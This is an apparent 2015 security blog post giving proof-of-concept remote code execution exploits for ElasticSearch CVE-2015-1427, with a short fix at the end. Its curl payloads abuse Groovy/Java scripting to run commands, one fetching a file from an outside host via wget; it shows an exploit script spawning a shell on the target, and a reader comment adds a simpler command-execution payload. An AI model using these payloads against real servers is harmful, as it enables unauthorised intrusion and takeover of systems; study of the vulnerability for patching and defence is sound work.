Wednesday, March 11, 2015
ElasticSearch CVE-2015-1427 RCE Exploit
References:
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048
Since the exploit is already out here [XiphosResearch github] and here [in a comment :-) ] and here [Metasploit pull request]
POC's
curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'
curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\") getRuntime() exec(\"wget -O /tmp/testy http://192.168.1.1:8080/es_test.txt\")"}}}'
$ cat /tmp/testy
It worked :-)
---
python elastic_shell.py 127.0.0.1
--snip--
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
elasticsearch
elasticsearch-service-mgr.exe
elasticsearch-service-x64.exe
elasticsearch-service-x86.exe
elasticsearch.bat
elasticsearch.in.bat
elasticsearch.in.sh
plugin
plugin.bat
service.bat
~$
To fix disable groovy scripting in config/elasticsearch.yml and upgrade to 1.4.3+
script.groovy.sandbox.enabled: false
Thx to groovy script enabled by default on recent version, it's more easier to execute:
ReplyDelete...
"script_fields": {
"result": {
"script" : "['ls','/'].execute().text",
"lang": "groovy"
}
}
....
Specify "lang" parameter makes this exploit works on any version (old version use mvel by default)